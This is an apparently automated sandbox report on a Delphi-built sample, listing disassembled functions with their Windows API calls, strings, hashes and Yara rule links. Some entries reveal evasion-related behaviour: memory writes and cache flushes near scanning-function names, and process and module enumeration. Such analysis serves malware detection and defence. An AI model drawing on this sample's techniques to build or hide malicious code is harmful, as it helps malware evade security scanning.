                                                                                              Function 031B70DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SysFreeString.OLEAUT32(?), ref: 031B73DA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID: H
                                                                                              • API String ID: 3341692771-2852464175
                                                                                              • Opcode ID: 8cdcbd462c58b22f2933a1327d5e38640eb1394ddcdc02f6fed5893d88f8cdcf
                                                                                              • Instruction ID: b2cfaa4b15615b3e55dc60239fb5940140ae47acb7d84d484b3eb9077d75bc69
                                                                                              • Opcode Fuzzy Hash: 8cdcbd462c58b22f2933a1327d5e38640eb1394ddcdc02f6fed5893d88f8cdcf
                                                                                              • Instruction Fuzzy Hash: 24B1C278A016089FDB15CF99D880ADDBBF6FF8D310F2585A9E845AB360D730A845CF60
                                                                                              Function 031A4198 Relevance: 3.1, APIs: 2, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6a24f48e88f2bf155e618fd0f2a2f6023c8b0533f914f5c7d5c7c8f150af463b
                                                                                              • Instruction ID: 26b6a6584141fde19948508bf3385951f464bba92ace0af2002434d415bd4c1b
                                                                                              • Opcode Fuzzy Hash: 6a24f48e88f2bf155e618fd0f2a2f6023c8b0533f914f5c7d5c7c8f150af463b
                                                                                              • Instruction Fuzzy Hash: 51419E7D900A14EFDB28EF6EF8483557BE4EB1D312F599469D8048B348CBB09885CB55
                                                                                              Function 031AE364 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: 7dbf56415bc9d362e0aec6b856fd48822fd7d52ad02a0fbcb92b377d478bdc96
                                                                                              • Instruction ID: c6a368786ad219546db0107cbae7fc879da54c7573622a2fa515620ee8258a4f
                                                                                              • Opcode Fuzzy Hash: 7dbf56415bc9d362e0aec6b856fd48822fd7d52ad02a0fbcb92b377d478bdc96
                                                                                              • Instruction Fuzzy Hash: ACF0AF6C708A10C7EB24FB3E8DC456D27989F4C343B143876E4069F205CB658C8983B2
                                                                                              Function 031AE3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1927566239-0
                                                                                              • Opcode ID: 093da035ec35ebbb9968446ed9ae6352b0e4155b1a36b680de0b061d7f3e69b5
                                                                                              • Instruction ID: 144b62c9e11a3e91850bd6a75139fdd424a3bb49ed5d9cb80653204b0298bf8c
                                                                                              • Opcode Fuzzy Hash: 093da035ec35ebbb9968446ed9ae6352b0e4155b1a36b680de0b061d7f3e69b5
                                                                                              • Instruction Fuzzy Hash: 49317179604A08AFDB14DFACD8889AEBBFCEB0C212F584565F904D7240D334DA90CBB1
                                                                                              Function 031B89D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                                • Part of subcall function 031B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B7DEC
                                                                                                • Part of subcall function 031B8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031B83C2), ref: 031B83A4
                                                                                              • FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CacheFlushFreeHandleInstructionLibraryMemoryModuleVirtualWrite
                                                                                              • String ID:
                                                                                              • API String ID: 1648090374-0
                                                                                              • Opcode ID: 3992cf2d292fdd343620fa7ef38b878a326c8f0f1e85e4b117bc2c8adeaf14c5
                                                                                              • Instruction ID: 413ee0fb2e372b3de6c06d345822de7c3fc9411e3285857fc337108e84f356d9
                                                                                              • Opcode Fuzzy Hash: 3992cf2d292fdd343620fa7ef38b878a326c8f0f1e85e4b117bc2c8adeaf14c5
                                                                                              • Instruction Fuzzy Hash: F121817C758744BFDB50FBBDDC02F9D7AA89B4CA01F501460F514EF682CBB4A9408618
                                                                                              Function 031AE760 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 031AE781
                                                                                                • Part of subcall function 031AE364: VariantClear.OLEAUT32(?), ref: 031AE373
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCopy
                                                                                              • String ID:
                                                                                              • API String ID: 274517740-0
                                                                                              • Opcode ID: 2f7bc6703029b537cc3c0958fa9f72b3d5fce08f432651dac9d9f0416ab38ddb
                                                                                              • Instruction ID: ed7bd3f16088e58454184136246fbd8b4bb2ad7ee0582e47df3682fd21eaf1ca
                                                                                              • Opcode Fuzzy Hash: 2f7bc6703029b537cc3c0958fa9f72b3d5fce08f432651dac9d9f0416ab38ddb
                                                                                              • Instruction Fuzzy Hash: E8117C2C700B1087D735EB6DC9C49667BE9AF8D663B058476E44A8F219DB30CC85D6F2
                                                                                              Function 031BE624 Relevance: 1.5, APIs: 1, Instructions: 37networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031B89D0: FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 031BE5F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckConnectionFreeInternetLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 2507004976-0
                                                                                              • Opcode ID: 104a434822977e04e7b08ddd7564887a95338df1bb8492c57f98fef11d24af25
                                                                                              • Instruction ID: d0be18192739c63018ae811550e320a690a12b6643380dd0f941a7d632d314d9
                                                                                              • Opcode Fuzzy Hash: 104a434822977e04e7b08ddd7564887a95338df1bb8492c57f98fef11d24af25
                                                                                              • Instruction Fuzzy Hash: 21F0F93DA187489FDB10EBB9E880ADD73B4AF8C711F608436E045EA240DFA5A8058725
                                                                                              Function 031B6D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CLSIDFromProgID.COMBASE ref: 031B6D9E
                                                                                                • Part of subcall function 031A4C60: SysFreeString.OLEAUT32 ref: 031A4C6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeFromProgString
                                                                                              • String ID:
                                                                                              • API String ID: 4225568880-0
                                                                                              • Opcode ID: 6e16a2d5b53366f81455c5909c703f8f932d392ccdda43820a1aeb33030ec0f6
                                                                                              • Instruction ID: 9d02d6454c0630bbc31e658f0f78a82f756dd3d5335de4a83778a8d862e1dc1b
                                                                                              • Opcode Fuzzy Hash: 6e16a2d5b53366f81455c5909c703f8f932d392ccdda43820a1aeb33030ec0f6
                                                                                              • Instruction Fuzzy Hash: CAE0ED3D204B08BFD311EB6ADC42D9EB6ECDB8E640B9204B0E900E7600DBB1AE0080A0
                                                                                              Function 031A5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(20FB1B20,?,00000105), ref: 031A5886
                                                                                                • Part of subcall function 031A5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 031A5AE8
                                                                                                • Part of subcall function 031A5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5B06
                                                                                                • Part of subcall function 031A5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5B24
                                                                                                • Part of subcall function 031A5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 031A5B42
                                                                                                • Part of subcall function 031A5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,031A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 031A5B8B
                                                                                                • Part of subcall function 031A5ACC: RegQueryValueExA.ADVAPI32(?,031A5D38,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,031A5BD1,?,80000001), ref: 031A5BA9
                                                                                                • Part of subcall function 031A5ACC: RegCloseKey.ADVAPI32(?,031A5BD8,00000000,00000000,00000005,00000000,031A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5BCB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                                              • String ID:
                                                                                              • API String ID: 2796650324-0
                                                                                              • Opcode ID: b9746befce64e71ff07d12d308fb9915a3fb36454f89001aea748d68f1661a61
                                                                                              • Instruction ID: 2714ce670d9a36361ff894420f57f3916a11885aa4c4e42c99b7aa1532cb7fbd
                                                                                              • Opcode Fuzzy Hash: b9746befce64e71ff07d12d308fb9915a3fb36454f89001aea748d68f1661a61
                                                                                              • Instruction Fuzzy Hash: C6E09279A047149FCB10DEACD8C0A5633D8AF0D751F0809A1ED94CF346D7B0D91087D0
                                                                                              Function 031A7E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,031C356F,ScanString,03223160,031CB7B8,OpenSession,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,Initialize), ref: 031A7E8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
                                                                                              • Instruction ID: 1420b44c594ba29a2d6c4a41eb02d3d653e333367ba096040f9572dfb63c21d9
                                                                                              • Opcode Fuzzy Hash: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
                                                                                              • Instruction Fuzzy Hash: 13C08CFE215B000F5E60E9FC1CC81198288098C033B681E61E438CA3C2D71698332020
                                                                                              Function 031A4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID:
                                                                                              • API String ID: 3341692771-0
                                                                                              • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                              • Instruction ID: c340adfc147778991e2f2e80d2cefda0b7ae1791c978a129f73b39be9e840048
                                                                                              • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                              • Instruction Fuzzy Hash: B6C012AE600A3067EB61D69EACC075262CCDB0D296F1804A19408DB355E7A0D8004290
                                                                                              Function 031A4D50 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID:
                                                                                              • API String ID: 3341692771-0
                                                                                              • Opcode ID: d54247db1b258156244adbb806ac4dd0cd010764ffdd17f74803e917e64435c1
                                                                                              • Instruction ID: d6a4fd4dc15c480c5348ccd84f4cea85b339974e0d9d284a1cc53a1c1be76d7b
                                                                                              • Opcode Fuzzy Hash: d54247db1b258156244adbb806ac4dd0cd010764ffdd17f74803e917e64435c1
                                                                                              • Instruction Fuzzy Hash: 31C0127C105B057FAB08AB3A5E4057A92189D8D24375444A59911CC114EB68D4415524
                                                                                              Function 031CC35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Eventtime
                                                                                              • String ID:
                                                                                              • API String ID: 2982266575-0
                                                                                              • Opcode ID: 2022fd3735866528ccb1e540448191d7ad5afe6b570bb6c4e837c8f667982d46
                                                                                              • Instruction ID: 248f693e043ba0ee0d571a8f19dd3c9d83027e6358007c543fb6a4cd214ef966
                                                                                              • Opcode Fuzzy Hash: 2022fd3735866528ccb1e540448191d7ad5afe6b570bb6c4e837c8f667982d46
                                                                                              • Instruction Fuzzy Hash: F3C048B53A07802BFA10A6A96CC2F225A9C9359B12F101015B609EE2C1D7E658018AA4
                                                                                              Function 031A15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 031A15E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: e6301ea9cf52f523278b67c146afea63858b223f51adbe9e03a8188e8da96b10
                                                                                              • Instruction ID: fd0e4d27573ff659c1bcf7fc8944bf57e8fcc58cb7cd80b759baea7e70c6813d
                                                                                              • Opcode Fuzzy Hash: e6301ea9cf52f523278b67c146afea63858b223f51adbe9e03a8188e8da96b10
                                                                                              • Instruction Fuzzy Hash: 0CF049F4711B006FDB19EFBAAD443017AD2E78E245F24D139D609DB39CE7B194018B00
                                                                                              Function 031A1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 031A16A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 01eea270bc588144efd72f11827681b51a8c3823e56c01357418ff9d3676e340
                                                                                              • Instruction ID: e195c64c9652385b45d03662b13c4e37a0cca0a334ad15251da62531d09d4b57
                                                                                              • Opcode Fuzzy Hash: 01eea270bc588144efd72f11827681b51a8c3823e56c01357418ff9d3676e340
                                                                                              • Instruction Fuzzy Hash: 44F09AB6A00F957BD720EE5EAC84B82BB94FB18321F154139EA089B344D7B1AC008794
                                                                                              Function 031A16E6 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 031A1704
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 1263568516-0
                                                                                              • Opcode ID: 3ed22fb411af90ac9cca8df743a390b388d21760d1f2fe02f1c16e68c7044243
                                                                                              • Instruction ID: 845a432a4ae1017cfb6ca84c9a68cbe033e896c34f9d44086d227bc4f96e68af
                                                                                              • Opcode Fuzzy Hash: 3ed22fb411af90ac9cca8df743a390b388d21760d1f2fe02f1c16e68c7044243
                                                                                              • Instruction Fuzzy Hash: F9E0267D300B007FE7209A7D5D40B12BBC9EB4C272F245575F201CB2D1C3A0D8008360

                                                                                              Non-executed Functions

                                                                                              Function 031A5BD7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99stringlibrarythreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 031A5BE8
                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 031A5BF5
                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 031A5BFB
                                                                                              • lstrlen.KERNEL32(00000000), ref: 031A5C26
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 031A5C6D
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5C7D
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 031A5CA5
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CB5
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CDB
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                              • String ID: .
                                                                                              • API String ID: 1599918012-248832578
                                                                                              • Opcode ID: e1d207cfd59d9a3355d61464253f03734f19f47a71b5373a3b145886073fdf91
                                                                                              • Instruction ID: 469de7025c163abee040b1d9fed955959f0a269cc12e1dd07ed4937a7cc7bf12
                                                                                              • Opcode Fuzzy Hash: e1d207cfd59d9a3355d61464253f03734f19f47a71b5373a3b145886073fdf91
                                                                                              • Instruction Fuzzy Hash: D431947DE4476C3BEB25D6BC8C45BDEB6AD9B0D381F0401F2A644E6089E774DE888B50
                                                                                              Function 031BAB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,031BADA3,?,?,031BAE35,00000000,031BAF11), ref: 031BAB30
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 031BAB48
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 031BAB5A
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 031BAB6C
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 031BAB7E
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 031BAB90
                                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 031BABA2
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 031BABB4
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 031BABC6
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 031BABD8
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 031BABEA
                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 031BABFC
                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 031BAC0E
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 031BAC20
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 031BAC32
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 031BAC44
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 031BAC56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                              • API String ID: 667068680-597814768
                                                                                              • Opcode ID: d9dc3150b8e456fdb34e11f8e484d3cb132e42c9ee8b804d67258c64b6898c63
                                                                                              • Instruction ID: 0646a5d3d52cc7023fa40afa187535ec76a4bc1593474fe39d0d1cfb11c48532
                                                                                              • Opcode Fuzzy Hash: d9dc3150b8e456fdb34e11f8e484d3cb132e42c9ee8b804d67258c64b6898c63
                                                                                              • Instruction Fuzzy Hash: EA3101B8644750AFDF10EFBCEC89AAD77B8AF2D2027045961E814DF24AE374A450CB51
                                                                                              Function 031B6ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 031B6EDE
                                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 031B6EEF
                                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 031B6EFF
                                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 031B6F0F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 031B6F1F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 031B6F2F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 031B6F3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                              • API String ID: 667068680-2233174745
                                                                                              • Opcode ID: ed87545d6584ef5a52a763ce8bc2d2ae29e00973059eeaf8268c136d0fb74543
                                                                                              • Instruction ID: 1049c17b129bc2e787bd6edc0e0eb9c4fd97038785cb5feca623bb9fbbee7350
                                                                                              • Opcode Fuzzy Hash: ed87545d6584ef5a52a763ce8bc2d2ae29e00973059eeaf8268c136d0fb74543
                                                                                              • Instruction Fuzzy Hash: 41F04CFA6587807FEA04FB785C928AA2B78A93C5073082C1DF91599987E779D8448B70
                                                                                              Function 031A2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 031A28CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message
                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                              • API String ID: 2030045667-32948583
                                                                                              • Opcode ID: ad446a0b1a5ba0e2f7eee0332624210fe576cd9c551fe1e4249b01706b2bf381
                                                                                              • Instruction ID: 57d72bc7ddde31a5b2728a33fdb9fc0f5ee83c5be594650a2ab81b235b0cfd99
                                                                                              • Opcode Fuzzy Hash: ad446a0b1a5ba0e2f7eee0332624210fe576cd9c551fe1e4249b01706b2bf381
                                                                                              • Instruction Fuzzy Hash: 98A1D838A047648BDB21EA2CCC84BD8B6F4EB0D752F1448E5E949AB281CB7589C7CB51
                                                                                              Function 031A252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • The unexpected small block leaks are:, xrefs: 031A2707
                                                                                              • , xrefs: 031A2814
                                                                                              • Unexpected Memory Leak, xrefs: 031A28C0
                                                                                              • 7, xrefs: 031A26A1
                                                                                              • An unexpected memory leak has occurred. , xrefs: 031A2690
